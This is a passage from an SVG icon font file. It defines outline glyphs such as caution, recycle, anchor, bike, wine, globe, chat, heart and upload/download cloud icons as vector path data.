1.472 2.624c0.8 1.28 84.224 149.952 84.224 272.512z" />
<glyph unicode="&#xe03d;" glyph-name="caution" horiz-adv-x="1120" d="M697.568 865.472c-35.36 60.928-83.488 94.528-135.52 94.528s-100.192-33.6-135.552-94.528l-392.608-676.256c-35.84-62.304-39.68-127.008-10.56-177.472 27.712-48 82.080-75.616 149.248-75.744h778.912c0 0 0 0 0.032 0 67.264 0.128 121.728 27.648 149.344 75.552 28.96 50.144 25.056 114.592-10.72 176.8l-392.576 677.12zM1073.184 27.552c-21.792-37.76-66.144-59.456-121.728-59.552h-778.848c-55.392 0.096-99.68 21.888-121.568 59.744-23.264 40.32-19.392 93.344 10.56 145.472l392.576 676.192c29.408 50.688 67.712 78.592 107.872 78.592s78.464-27.904 107.84-78.592l392.576-677.024c29.92-52.032 33.824-104.832 10.72-144.832zM562.048 320c8.832 0 16 7.168 16 16v320c0 8.832-7.168 16-16 16s-16-7.168-16-16v-320c0-8.832 7.168-16 16-16zM560 240c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM560 144c-17.632 0-32 14.336-32 32s14.368 32 32 32 32-14.336 32-32-14.368-32-32-32z" />
<glyph unicode="&#xe03e;" glyph-name="recycle" d="M388.736 874.688l-98.016-145.76c-4.928-7.328-2.976-17.28 4.352-22.208s17.28-2.976 22.208 4.352l98.592 146.656c26.24 45.344 60.416 70.272 96.128 70.272s69.888-24.928 96.096-70.208l176.448-307.2-125.44 25.088c-8.736 1.824-17.12-3.872-18.816-12.576-1.728-8.672 3.904-17.088 12.544-18.816l160-32c1.088-0.192 2.144-0.288 3.168-0.288 2.528 0 4.896 0.8 7.072 1.888 0.288 0.128 0.608 0.064 0.896 0.224 0.32 0.192 0.512 0.512 0.832 0.736 1.056 0.704 1.984 1.536 2.848 2.496 0.512 0.544 1.024 1.024 1.44 1.632 0.672 0.992 1.12 2.080 1.568 3.2 0.288 0.736 0.672 1.408 0.832 2.176 0.032 0.192 0.16 0.32 0.192 0.512l32 160c1.728 8.672-3.904 17.088-12.544 18.816-8.736 1.824-17.12-3.872-18.816-12.576l-23.648-118.24-172.832 300.928c-32.256 55.584-76.224 86.208-123.84 86.208s-91.584-30.624-123.264-85.312zM320 47.392c0 8.832-7.168 16-16 16h-143.968c-49.504 0.096-89.088 19.488-108.544 53.248-20.736 35.936-17.248 83.328 9.6 130.016l176.384 308.608 51.68-129.248c2.496-6.208 8.512-10.016 14.848-10.016 1.984 0 4 0.384 5.952 1.152 8.192 3.296 12.192 12.608 8.928 20.768l-64 160c-0.32 0.832-0.896 1.44-1.344 2.176-0.416 0.672-0.704 1.344-1.216 1.984-1.12 1.344-2.4 2.4-3.808 3.296-0.224 0.16-0.352 0.384-0.576 0.512-0.032 0.032-0.064 0-0.096 0.032-1.792 1.024-3.744 1.632-5.824 1.888-0.352 0.032-0.672-0.064-1.024-0.032-1.376 0.096-2.72 0.192-4.128-0.128l-160-32c-8.672-1.728-14.272-10.144-12.544-18.816s10.016-14.304 18.816-12.576l125.504 25.088-175.36-306.816c-32.672-56.8-36.128-115.84-9.536-161.952 25.344-43.872 74.976-69.12 136.224-69.248h144c8.864 0.064 16.032 7.232 16.032 16.064zM1000.448 100.928c26.336 45.632 22.784 104.256-8.992 159.36l-64.8 146.176c-3.584 8.064-13.024 11.776-21.12 8.128-8.064-3.584-11.712-13.024-8.128-21.12l65.568-147.648c26.688-46.464 30.272-93.44 9.792-128.896-19.36-33.568-59.008-52.832-108.768-52.928l-329.92-0.544 69.216 69.216c6.24 6.24 6.24 16.384 0 22.624s-16.384 6.24-22.624 0l-96-96c-3.2-3.2-4.704-7.424-4.64-11.616 0-0.096-0.064-0.192-0.064-0.32 0-5.184 2.656-9.6 6.528-12.512l94.176-94.176c3.136-3.104 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-68.16 68.16 328.864 0.544c61.44 0.128 111.168 25.248 136.416 68.928z" />
<glyph unicode="&#xe03f;" glyph-name="anchor" horiz-adv-x="1120" d="M25.984 355.328l70.016 70.048v-25.376c0-242.848 221.152-464 464-464s464 221.152 464 464v24.704l70.688-70.688c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-96.576 96.576c-2.944 4-7.424 6.784-12.768 6.784-1.44 0-2.688-0.448-4.032-0.8-2.944-0.608-5.792-1.728-7.968-3.872l-97.344-97.344c-6.24-6.24-6.24-16.384 0-22.624s16.384-6.24 22.624 0l70.72 70.688v-26.048c0-220.736-196.32-421.664-416-431.104v607.104h272c8.832 0 16 7.168 16 16s-7.168 16-16 16h-272v129.632c54.144 7.84 96 54.112 96 110.368 0 61.76-50.24 112-112 112s-112-50.24-112-112c0-56.256 41.856-102.528 96-110.368v-129.632h-272c-8.832 0-16-7.168-16-16s7.168-16 16-16h272v-607.104c-219.68 9.44-416 210.368-416 431.104v25.376l71.36-71.36c3.136-3.136 7.232-4.672 11.328-4.672s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.384 0 22.624l-98.656 98.624c-2.912 2.944-6.944 4.736-11.36 4.736s-8.448-1.792-11.328-4.704l-97.312-97.312c-6.24-6.24-6.24-16.384 0-22.624s16.384-6.272 22.624-0.032zM560 928c44.096 0 80-35.872 80-80s-35.904-80-80-80-80 35.872-80 80 35.904 80 80 80z" />
<glyph unicode="&#xe040;" glyph-name="profile-male" horiz-adv-x="1152" d="M16-63.456c8.576-2.144 17.344 2.816 19.584 11.328 32.96 122.976 166.912 154.848 246.976 173.92 20.064 4.768 35.904 8.544 46.208 12.992 91.2 39.584 120.928 103.264 129.824 149.728 1.088 5.6-0.928 11.36-5.28 15.136-47.488 40.992-87.552 102.528-112.832 173.312-0.704 2.016-1.824 3.872-3.296 5.472-33.44 36.352-52.64 74.784-52.64 105.408 0 17.888 6.752 29.888 21.952 38.944 4.64 2.784 7.552 7.68 7.776 13.056 7.072 163.008 123.168 291.328 265.568 292.16 0.16 0 3.264-0.224 3.424-0.224 143.104-1.984 258.464-133.056 262.592-298.368 0.128-4.576 2.176-8.864 5.696-11.808 10.016-8.48 14.688-19.232 14.688-33.824 0-25.632-13.664-57.152-38.432-88.704-1.184-1.504-2.080-3.232-2.688-5.056-25.6-81.152-71.552-152.8-126.016-196.64-4.608-3.712-6.784-9.664-5.696-15.456 8.896-46.432 38.624-110.080 129.824-149.728 10.784-4.672 27.52-8.32 48.736-12.896 79.264-17.152 211.904-45.92 244.448-167.424 1.92-7.136 8.384-11.84 15.424-11.84 1.376 0 2.752 0.192 4.16 0.544 8.544 2.304 13.6 11.072 11.328 19.616-37.6 140.384-187.872 172.928-268.576 190.4-18.72 4.064-34.88 7.552-42.752 11.008-59.52 25.856-96.192 65.248-109.152 117.28 55.264 47.456 101.504 120.672 127.936 202.784 28.064 36.48 43.488 74.048 43.488 106.144 0 21.408-6.912 39.264-20.608 53.216-7.616 179.328-135.584 320.544-294.4 322.816l-4.768 0.064c-155.936-0.832-284.448-138.336-295.68-314.56-20.032-14.72-30.208-35.36-30.208-61.568 0-37.856 21.408-83.136 58.88-124.672 25.888-71.136 66.016-133.632 113.792-177.376-12.896-52.224-49.6-91.744-109.248-117.632-7.712-3.36-23.072-7.040-40.864-11.264-81.312-19.328-232.608-55.328-270.496-196.704-2.272-8.544 2.784-17.28 11.328-19.584z" />
<glyph unicode="&#xe041;" glyph-name="profile-female" horiz-adv-x="1152" d="M711.040 296.768c-5.024 0.768-10.144-1.216-13.6-4.96-3.488-3.712-4.992-8.896-4.032-13.92 8.832-46.4 38.56-110.080 129.824-149.728 10.816-4.672 27.52-8.32 48.704-12.896 79.296-17.152 211.904-45.888 244.48-167.424 1.92-7.136 8.384-11.84 15.456-11.84 1.376 0 2.752 0.192 4.16 0.544 8.544 2.304 13.6 11.072 11.328 19.616-37.664 140.384-187.904 172.928-268.64 190.4-18.688 4.064-34.848 7.552-42.752 11.008-54.848 23.808-90.272 59.136-105.632 105.152 152.384-11.328 221.376 49.376 224.416 52.128 3.776 3.424 5.728 8.512 5.152 13.6s-3.52 9.6-7.968 12.16c-87.936 50.24-87.936 223.84-87.936 289.216 0 182.816-123.136 327.744-280.992 330.016-0.448 0.032-3.872 0.096-4.512 0.096 0 0 0 0-0.032 0-160.16-0.896-290.464-145.984-290.464-323.456 0-65.376 0-239.008-87.936-289.216-4.64-2.656-7.616-7.424-8.032-12.736-0.384-5.312 1.92-10.496 6.112-13.792 4.416-3.424 102.016-78.112 222.112-55.424-16.064-44.096-51.008-78.016-104.256-101.152-7.712-3.36-23.072-7.040-40.864-11.264-81.28-19.328-232.608-55.328-270.496-196.704-2.272-8.576 2.784-17.312 11.328-19.616 8.672-2.144 17.312 2.816 19.616 11.328 32.928 123.008 166.944 154.848 246.976 173.92 20.064 4.768 35.904 8.544 46.208 12.992 91.264 39.648 120.96 103.328 129.824 149.728 1.056 5.536-0.864 11.232-5.088 14.944-4.192 3.744-9.984 5.024-15.424 3.328-86.624-27.264-166.656 10.24-201.632 31.040 83.552 69.952 83.552 230.944 83.552 302.624 0 159.904 116.032 290.656 259.84 291.52 0.16 0 3.264-0.192 3.392-0.192 141.824-2.016 248.768-130.112 248.768-297.984 0-71.712 0-233.056 83.904-303.008-28.896-16.512-94.784-43.232-204.864-30.048z" />
<glyph unicode="&#xe042;" glyph-name="bike" horiz-adv-x="1792" d="M1456 608c-61.568 0-119.136-16.928-168.832-45.952l-217.632 333.952h307.168c-0.416-15.936-4.128-42.592-22.368-63.552-18.784-21.536-49.152-32.448-90.336-32.448-8.832 0-16-7.168-16-16s7.168-16 16-16c50.848 0 89.344 14.592 114.432 43.392 37.216 42.752 29.76 100.352 29.408 102.784-1.088 7.904-7.84 13.824-15.84 13.824h-352c-5.888 0-11.296-3.232-14.048-8.384-2.816-5.152-2.56-11.424 0.672-16.384l90.592-139.008h-507.68l-98.656 163.776h177.12c8.832 0 16 7.168 16 16s-7.168 16-16 16h-288c-8.832 0-16-7.168-16-16s7.168-16 16-16h74.048c0.32-0.736 0.384-1.536 0.8-2.24l109.184-181.184-97.728-172.48c-45.28 22.752-96.224 35.904-150.304 35.904-185.28 0-336-150.72-336-336s150.72-336 336-336c178.816 0 325.024 140.512 333.44 320h354.56c0.928-18.528-3.072-43.776-20.608-63.648-18.944-21.472-49.696-32.352-91.392-32.352-8.832 0-16-7.168-16-16s7.168-16 16-16c51.456 0 90.368 14.624 115.648 43.456 36.544 41.728 29.664 97.152 29.376 99.488-1.056 7.968-7.84 13.92-15.872 13.92h-125.696l225.504 442.88 119.36-183.168c-84.8-61.024-140.32-160.32-140.32-272.576 0-185.28 150.72-336 336-336s336 150.72 336 336-150.72 336-336 336zM1107.36 736l-219.136-434.176-259.392 434.176h478.528zM602.976 713.12l258.080-428.256h-189.696c-4.352 114.4-65.984 214.144-157.184 271.488l88.8 156.768zM639.36 284.864h-279.008l138.048 243.68c81.536-51.808 136.608-141.184 140.96-243.68zM336-32c-167.616 0-304 136.384-304 304s136.384 304 304 304c48.32 0 93.888-11.648 134.528-31.776l-151.552-267.456c-2.816-4.928-2.784-11.008 0.096-15.936 2.848-4.896 8.128-7.936 13.824-4.8h306.144c-9.952-161.856-141.856-288.032-303.040-288.032zM1456-32c-167.616 0-304 136.384-304 304 0 101.024 49.728 190.464 125.824 245.76l167.904-257.632c3.072-4.672 8.192-7.264 13.408-7.264 3.008 0 6.016 0.832 8.736 2.592 7.36 4.8 9.472 14.752 4.672 22.144l-167.904 257.632c44.64 25.792 96.224 40.768 151.36 40.768 167.616 0 304-136.384 304-304s-136.384-304-304-304z" />
<glyph unicode="&#xe043;" glyph-name="wine" horiz-adv-x="736" d="M729.664 714.848c0 72.096-21.984 177.088-63.968 238.208-2.976 4.352-7.904 6.944-13.184 6.944h-575.36c-5.28 0-10.208-2.592-13.184-6.944-41.984-61.184-63.968-166.144-63.968-238.208 0-189.824 151.36-400.928 352-411.808v-271.040h-131.168c-36.512 2.4-64-25.088-64-61.6v-18.4c0-8.832 7.168-16 16-16h384c8.832 0 16 7.168 16 16v16c0 37.248-28.128 66.4-64 64h-124.832v271.040c200.64 10.88 345.664 221.984 345.664 411.808zM540.832-32h-352v2.4c0 18.848 13.152 32 32 32h288c18.272 0 32-14.784 32-34.4zM85.824 928h558.016c33.696-54.144 52.192-143.040 53.536-205.696-27.040 6.272-55.872 9.92-88.64 9.92-101.152 0-152.288-29.472-201.76-57.984-47.904-27.616-93.152-53.696-185.728-53.696s-137.76 26.144-185.632 53.76l-0.96 0.576c-1.6 13.408-2.656 26.784-2.656 39.968 0 62.816 18.816 156.864 53.824 213.152zM41.952 633.984c43.424-23.968 93.216-45.376 179.328-45.376 101.12 0 152.256 29.472 201.728 57.984 47.904 27.584 93.152 53.696 185.76 53.696 32.8 0 61.408-3.52 87.648-10.24-12.704-169.984-152.864-356-331.552-356-159.168-0.032-287.648 147.584-322.912 299.936z" />
<glyph unicode="&#xe044;" glyph-name="hotairballoon" horiz-adv-x="896" d="M896 659.168c0 202.432-146.528 300.832-448 300.832s-448-98.4-448-300.832c0-232.8 421.536-501.376 439.456-512.672 0.032-0.032 0.096 0 0.16-0.032 0.352-0.224 0.736-0.224 1.12-0.416 2.304-1.216 4.736-2.048 7.264-2.048s4.96 0.832 7.264 2.016c0.352 0.192 0.768 0.192 1.12 0.416 0.032 0.032 0.096 0 0.16 0.032 17.92 11.328 439.456 279.872 439.456 512.704zM576 659.168c0-177.92-92.032-387.872-128-463.136-35.968 75.232-128 285.088-128 463.136 0 240.96 73.056 268.832 128 268.832s128-27.872 128-268.832zM288 659.168c0-153.504 63.328-324.512 106.592-423.552-87.744 92.704-234.592 270.592-234.592 423.552 0 150.080 61.376 234.464 191.264 260.224-42.368-46.336-63.264-132.544-63.264-260.224zM608 659.168c0 127.68-20.864 213.888-63.264 260.224 129.888-25.76 191.264-110.176 191.264-260.224 0-152.96-146.848-330.816-234.592-423.552 43.264 99.008 106.592 270.048 106.592 423.552zM32 659.168c0 127.072 63.584 207.040 196.992 244.224-67.648-49.024-100.992-130.048-100.992-244.224 0-134.496 100.32-281.344 186.816-383.136-123.456 98.176-282.816 250.56-282.816 383.136zM581.184 276.032c86.496 101.792 186.816 248.608 186.816 383.136 0 114.176-33.344 195.232-100.992 244.224 133.408-37.184 196.992-117.152 196.992-244.224 0-132.576-159.36-284.96-282.816-383.136zM368 96c-8.832 0-16-7.168-16-16v-96c0-26.912 21.088-48 48-48h96c26.912 0 48 21.088 48 48v96c0 8.832-7.168 16-16 16h-160zM512-16c0-9.408-6.592-16-16-16h-96c-9.408 0-16 6.592-16 16v80h128v-80z" />
<glyph unicode="&#xe045;" glyph-name="globe" horiz-adv-x="800" d="M433.664 256c185.28 0 336 150.72 336 336s-150.72 336-336 336-336-150.72-336-336 150.72-336 336-336zM433.664 896c167.616 0 304-136.384 304-304s-136.384-304-304-304-304 136.384-304 304 136.352 304 304 304zM289.664 64c-36.512 0-64-27.488-64-64v-48c0-8.832 7.168-16 16-16h384c8.832 0 16 7.168 16 16v45.6c0 37.248-28.128 66.4-64 66.4h-288zM609.664-2.4v-29.6h-352v32c0 18.848 13.152 32 32 32h288c18.24 0 32-14.784 32-34.4zM417.76 160.704c0-0.192-0.096-0.32-0.096-0.512v-51.328c0-8.832 7.168-16 16-16s16 7.168 16 16v51.328c0 0.224-0.128 0.416-0.128 0.64 103.456 4.128 200.576 44.032 276.416 114.592l37.76-37.728c6.24-6.24 16.384-6.24 22.624 0s6.24 16.384 0 22.624l-48.832 48.832c-6.24 6.24-16.384 6.24-22.624 0-75.584-75.552-176.032-117.152-282.88-117.152s-207.296 41.6-282.848 117.152-117.152 176-117.152 282.848 41.6 207.296 117.152 282.848c6.24 6.24 6.24 16.384 0 22.624l-48.832 48.832c-6.24 6.24-16.384 6.24-22.624 0s-6.24-16.384 0-22.624l37.728-37.76c-74.592-80.096-115.424-183.904-115.424-293.92 0-115.36 44.928-223.872 126.528-305.472 78.208-78.208 181.216-122.272 291.232-125.824z" />
<glyph unicode="&#xe046;" glyph-name="genius" horiz-adv-x="960" d="M18.144 192c25.12-43.52 81.536-66.528 163.104-66.528 0 0 0 0 0.032 0 36.672 0 77.024 5.152 119.104 14.016 40.512-124.128 105.184-203.488 179.616-203.488s139.104 79.36 179.616 203.488c42.112-8.832 82.464-14.016 119.136-14.016 0 0 0 0 0 0 81.536 0 137.952 23.008 163.072 66.528 32.512 56.352 3.744 151.040-94.912 256 98.656 104.96 127.424 199.648 94.912 256-25.12 43.52-81.536 66.528-163.104 66.528-36.672 0-77.056-5.152-119.136-14.016-40.48 124.128-105.152 203.488-179.584 203.488s-139.104-79.36-179.616-203.488c-42.112 8.864-82.496 14.016-119.136 14.016-81.568 0-137.984-23.008-163.104-66.528-32.512-56.352-3.744-151.040 94.912-256-98.656-104.96-127.456-199.648-94.912-256zM480-32c-58.848 0-112.512 70.368-148.064 178.528 48.096 12.192 98.112 29.44 148.064 51.168 49.952-21.728 99.968-38.976 148.064-51.168-35.552-108.16-89.216-178.528-148.064-178.528zM288 448c0 37.248 1.984 73.504 5.376 108.576 28.576 19.904 58.784 39.296 90.624 57.696 31.488 18.176 63.712 34.464 96 49.056 32.288-14.56 64.512-30.848 96-49.056 31.84-18.368 62.016-37.76 90.624-57.696 3.392-35.072 5.376-71.328 5.376-108.576s-1.984-73.504-5.376-108.576c-28.576-19.904-58.784-39.296-90.624-57.696-31.488-18.176-63.712-34.464-96-49.056-32.288 14.56-64.512 30.848-96 49.056-31.84 18.368-62.016 37.76-90.624 57.696-3.392 35.072-5.376 71.328-5.376 108.576zM259.136 364.064c-36.672 27.552-69.888 55.84-98.752 83.936 28.864 28.096 62.080 56.384 98.752 83.936-1.888-27.328-3.136-55.2-3.136-83.936s1.248-56.608 3.136-83.936zM298.272 598.848c5.888 42.912 14.144 83.328 24.448 120.128 38.24-9.632 77.92-22.944 117.824-39.008-24.384-11.808-48.704-24.224-72.544-37.984-24.736-14.304-47.616-28.704-69.728-43.136zM519.424 679.968c39.904 16.064 79.584 29.376 117.824 39.008 10.304-36.8 18.56-77.216 24.448-120.128-22.080 14.432-44.992 28.832-69.728 43.136-23.808 13.76-48.128 26.176-72.544 37.984zM700.864 531.936c36.704-27.552 69.888-55.808 98.752-83.936-28.864-28.096-62.080-56.384-98.752-83.936 1.888 27.328 3.136 55.2 3.136 83.936s-1.248 56.608-3.136 83.936zM661.728 297.152c-5.888-42.912-14.144-83.328-24.448-120.128-38.24 9.632-77.92 22.944-117.824 39.008 24.416 11.776 48.736 24.224 72.576 37.984 24.704 14.304 47.584 28.704 69.696 43.136zM368 254.016c23.84-13.76 48.16-26.208 72.576-37.984-39.904-16.064-79.584-29.376-117.824-39.008-10.304 36.8-18.56 77.216-24.448 120.128 22.080-14.432 44.96-28.832 69.696-43.136zM914.144 208c-18.816-32.608-66.88-50.528-135.36-50.528-33.792 0-70.976 4.672-109.824 12.64 12.672 45.568 22.176 96.256 28.064 150.656 49.472 34.688 91.232 69.376 126.080 103.328 81.024-85.824 119.232-167.232 91.040-216.096zM778.752 738.528c68.48 0 116.576-17.952 135.36-50.528 28.224-48.864-10.016-130.272-91.040-216.096-34.848 33.92-76.608 68.64-126.080 103.328-5.888 54.4-15.392 105.088-28.064 150.656 38.848 7.968 76.064 12.64 109.824 12.64zM480 928c58.848 0 112.512-70.368 148.064-178.528-48.096-12.192-98.112-29.44-148.064-51.168-49.952 21.728-99.968 38.976-148.064 51.168 35.552 108.16 89.216 178.528 148.064 178.528zM45.856 688c18.816 32.608 66.88 50.528 135.36 50.528 33.792 0 70.976-4.672 109.824-12.64-12.672-45.568-22.176-96.256-28.064-150.656-49.472-34.688-91.232-69.376-126.080-103.328-81.024 85.824-119.232 167.232-91.040 216.096zM136.896 424.096c34.848-33.92 76.608-68.64 126.080-103.328 5.888-54.4 15.392-105.088 28.064-150.656-38.816-7.968-76-12.64-109.792-12.64 0 0-0.032 0-0.032 0-68.48 0-116.576 17.952-135.36 50.528-28.192 48.864 10.016 130.272 91.040 216.096zM480 368c44.096 0 80 35.872 80 80s-35.904 80-80 80-80-35.872-80-80 35.904-80 80-80zM480 496c26.464 0 48-21.536 48-48s-21.536-48-48-48-48 21.536-48 48 21.536 48 48 48z" />
<glyph unicode="&#xe047;" glyph-name="map-pin" horiz-adv-x="768" d="M384 960c-211.744 0-384-172.608-384-384.704 0-317.664 358.432-622.688 373.696-635.52 2.976-2.528 6.656-3.776 10.304-3.776 3.616 0 7.232 1.216 10.176 3.648 15.264 12.608 373.824 312.384 373.824 635.648 0 212.096-172.256 384.704-384 384.704zM384.064-26.816c-58.912 52.64-352.064 328.288-352.064 602.112 0 194.496 157.92 352.704 352 352.704s352-158.208 352-352.704c0-278.464-292.864-550.176-351.936-602.112zM384 768c-105.888 0-192-86.112-192-192s86.112-192 192-192 192 86.112 192 192-86.112 192-192 192zM384 416c-88.224 0-160 71.776-160 160s71.776 160 160 160 160-71.776 160-160-71.776-160-160-160z" />
<glyph unicode="&#xe048;" glyph-name="dial" d="M511.968 608c-87.328 0-159.072-71.040-159.968-158.368-0.896-88.224 70.144-160.704 158.368-161.632 0.032 0 1.6 0 1.664 0 87.328 0 159.072 71.040 159.968 158.368 0.896 88.224-70.144 160.736-160.032 161.632zM512.032 320v-16l-1.344 16c-70.56 0.704-127.392 58.72-126.688 129.312 0.704 69.856 58.112 126.688 129.312 126.688 70.56-0.704 127.392-58.72 126.688-129.312-0.704-69.856-58.112-126.688-127.968-126.688zM0 448c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM960 448c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM480 928c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM480-32c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM128 800c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM832 96c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM832 800c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM128 96c0-17.673 14.327-32 32-32s32 14.327 32 32c0 17.673-14.327 32-32 32s-32-14.327-32-32zM768 445.568v242.432c0 8.832-7.168 16-16 16h-240.032c-139.712 0-254.528-113.664-255.968-253.408-0.672-68.384 25.28-132.928 73.152-181.792s111.872-76.128 180.256-76.8c0.032 0 2.592 0 2.656 0 0 0 0 0 0 0 139.68 0 254.496 113.664 255.936 253.568zM512.032 224v-16l-2.304 16c-59.84 0.608-115.84 24.48-157.728 67.232s-64.608 99.232-64 159.072c1.248 122.24 101.696 221.696 226.432 221.696v0h221.568v-226.272c-1.248-122.272-101.728-221.76-223.968-221.728z" />
<glyph unicode="&#xe049;" glyph-name="chat" horiz-adv-x="1344" d="M1140.864 511.264c-8.448 2.624-17.408-1.984-20.096-10.4-2.656-8.416 1.984-17.408 10.4-20.096 125.056-39.84 180.832-99.264 180.832-192.768 0-83.168-75.872-147.712-121.056-178.816-4.352-3.008-6.944-7.904-6.944-13.184v-122.336c-23.36 8.704-64.096 28.48-100.032 68.96-3.744 4.192-9.44 6.112-14.976 5.088-9.12-1.76-18.432-4.256-27.872-6.784-16.32-4.384-33.152-8.928-49.12-8.928-82.176 0-139.712 17.664-198.528 60.896-7.168 5.248-17.12 3.68-22.368-3.424-5.248-7.136-3.712-17.12 3.392-22.368 64.864-47.68 127.872-67.104 217.504-67.104 20.192 0 39.136 5.088 57.44 10.016 5.696 1.568 11.36 3.104 16.96 4.416 59.808-63.168 127.456-77.536 130.4-78.112 1.056-0.224 2.112-0.32 3.2-0.32 3.648 0 7.264 1.248 10.112 3.616 3.744 3.040 5.888 7.584 5.888 12.384v135.648c82.624 58.912 128 129.824 128 200.352 0 108.192-64.544 179.136-203.136 223.264zM1056 528c0 246.272-224.576 432-522.336 432-299.264 0-533.664-189.792-533.664-432.064 0-145.248 102.752-249.312 192-312.288v-212.352c0-5.44 2.752-10.464 7.296-13.44 2.656-1.696 5.664-2.56 8.704-2.56 2.208 0 4.448 0.48 6.56 1.408 4.672 2.080 113.888 51.712 207.328 153.888 40.48-7.52 86.272-14.752 127.808-14.752 302.816 0 506.304 160.832 506.304 400.16zM549.664 159.84c-41.92 0-89.568 8.032-130.656 15.872-5.536 0.992-11.232-0.896-14.976-5.088-65.6-73.984-142.688-120.992-180.032-141.248v194.624c0 5.28-2.592 10.176-6.944 13.184-84.416 58.080-185.056 155.616-185.056 290.752 0 224.352 220.352 400.064 501.664 400.064 279.552 0 490.336-171.968 490.336-400 0-220.224-190.624-368.16-474.336-368.16zM528 592c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM528 496c-17.632 0-32 14.336-32 32s14.368 32 32 32 32-14.336 32-32-14.368-32-32-32zM752 592c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM752 496c-17.632 0-32 14.336-32 32s14.368 32 32 32 32-14.336 32-32-14.368-32-32-32zM304 588.96c-35.296 0-64-28.704-64-64s28.704-64 64-64 64 28.704 64 64-28.704 64-64 64zM304 492.96c-17.632 0-32 14.336-32 32s14.368 32 32 32 32-14.336 32-32-14.368-32-32-32z" />
<glyph unicode="&#xe04a;" glyph-name="heart2" horiz-adv-x="1184" d="M864 960c-79.232 0-155.392-29.472-214.528-83.040-22.464-20.32-41.696-43.424-57.472-68.928-15.776 25.504-35.008 48.608-57.472 68.96-59.136 53.536-135.296 83.008-214.528 83.008-176.448 0-320-143.552-320-320 0-119.104 37.056-213.12 123.872-314.4 126.144-147.2 445.408-371.84 458.944-381.344 2.752-1.952 5.984-2.912 9.184-2.912s6.432 0.96 9.184 2.912c13.536 9.504 332.8 234.144 458.976 381.344 86.784 101.28 123.84 195.296 123.84 314.4 0 176.448-143.552 320-320 320zM1035.872 346.4c-111.84-130.432-389.76-330.912-443.872-369.44-54.112 38.528-332.032 239.008-443.84 369.44-81.44 95.008-116.16 182.816-116.16 293.6 0 158.816 129.216 288 288 288 71.264 0 139.84-26.528 193.024-74.72 26.816-24.32 48.576-52.992 64.64-85.248 5.44-10.88 23.232-10.88 28.672 0 16.064 32.256 37.824 60.928 64.64 85.216 53.184 48.224 121.76 74.752 193.024 74.752 158.784 0 288-129.184 288-288 0-110.784-34.72-198.592-116.128-293.6z" />
<glyph unicode="&#xe04b;" glyph-name="cloud2" horiz-adv-x="1344" d="M1086.656 544.384c-13.664 211.584-160.8 415.616-430.656 415.616-246.816 0-437.152-183.456-447.232-428.288-135.040-42.016-208.768-186.528-208.768-291.712 0-161.952 134.592-304 288-304h768c155.104 0 288 167.168 288 304 0 165.344-135.136 294.656-257.344 304.384zM1056-32h-768c-136.384 0-256 127.104-256 272 0 97.632 85.568 272 256 272h48c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48c-16.288 0-31.68-1.824-46.688-4.448 12.544 191.68 158.24 388.448 414.688 388.448 274.816 0 400-215.648 400-416v-48c0-8.832 7.168-16 16-16s16 7.168 16 16v48c0 0.096 0 0.192 0 0.288 96.608-10.592 224-114.272 224-272.288 0-122.432-118.112-272-256-272z" />
<glyph unicode="&#xe04c;" glyph-name="upload4" horiz-adv-x="1344" d="M1086.656 544.384c-13.664 211.584-160.8 415.616-430.656 415.616-246.816 0-437.152-183.456-447.232-428.288-135.040-42.016-208.768-186.528-208.768-291.712 0-161.952 134.592-304 288-304h208c8.832 0 16 7.168 16 16s-7.168 16-16 16h-208c-136.384 0-256 127.104-256 272 0 97.632 85.568 272 256 272h48c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48c-16.288 0-31.68-1.824-46.688-4.448 12.544 191.68 158.24 388.448 414.688 388.448 274.816 0 400-215.648 400-416v-48c0-8.832 7.168-16 16-16s16 7.168 16 16v48c0 0.096 0 0.192 0 0.288 96.608-10.592 224-114.272 224-272.288 0-122.432-118.112-272-256-272h-240c-103.616 0-144 40.384-144 144v438.944l130.496-130.24c3.136-3.136 7.232-4.704 11.328-4.704s8.192 1.568 11.328 4.672c6.24 6.24 6.24 16.416 0 22.624l-142.752 142.464c-19.008 18.944-33.76 18.944-52.736 0l-142.752-142.464c-6.24-6.208-6.24-16.384 0-22.624s16.384-6.24 22.624 0l130.464 130.272v-438.944c0-121.728 54.272-176 176-176h240c155.104 0 288 167.168 288 304 0 165.344-135.136 294.656-257.344 304.384z" />
<glyph unicode="&#xe04d;" glyph-name="download4" horiz-adv-x="1344" d="M1086.656 544.576c-13.76 211.52-160.864 415.424-430.656 415.424-32.928 0-65.408-3.2-96.576-9.504-8.672-1.76-14.24-10.176-12.512-18.88 1.76-8.672 10.048-14.24 18.88-12.512 29.056 5.92 59.424 8.896 90.208 8.896 274.816 0 400-215.648 400-416v-48c0-8.832 7.168-16 16-16s16 7.168 16 16v48c0 0.16-0.032 0.352-0.032 0.512 98.016-8.448 224.032-93.824 224.032-272.512 0-152.544-112.448-272-256-272h-768c-127.232 0-256 93.44-256 272 0 131.008 80.128 272 256 272h48c8.832 0 16 7.168 16 16s-7.168 16-16 16h-48v64c0 119.264 73.568 193.344 192 193.344 107.648 0 192-84.928 192-193.344v-415.776l-133.12 123.52c-6.4 6.016-16.544 5.664-22.592-0.832-6.016-6.464-5.664-16.608 0.832-22.592l144.512-134.048c9.568-9.536 18.016-14.24 26.464-14.24 8.352 0 16.64 4.64 25.856 13.856l144.928 134.464c6.496 6.016 6.88 16.128 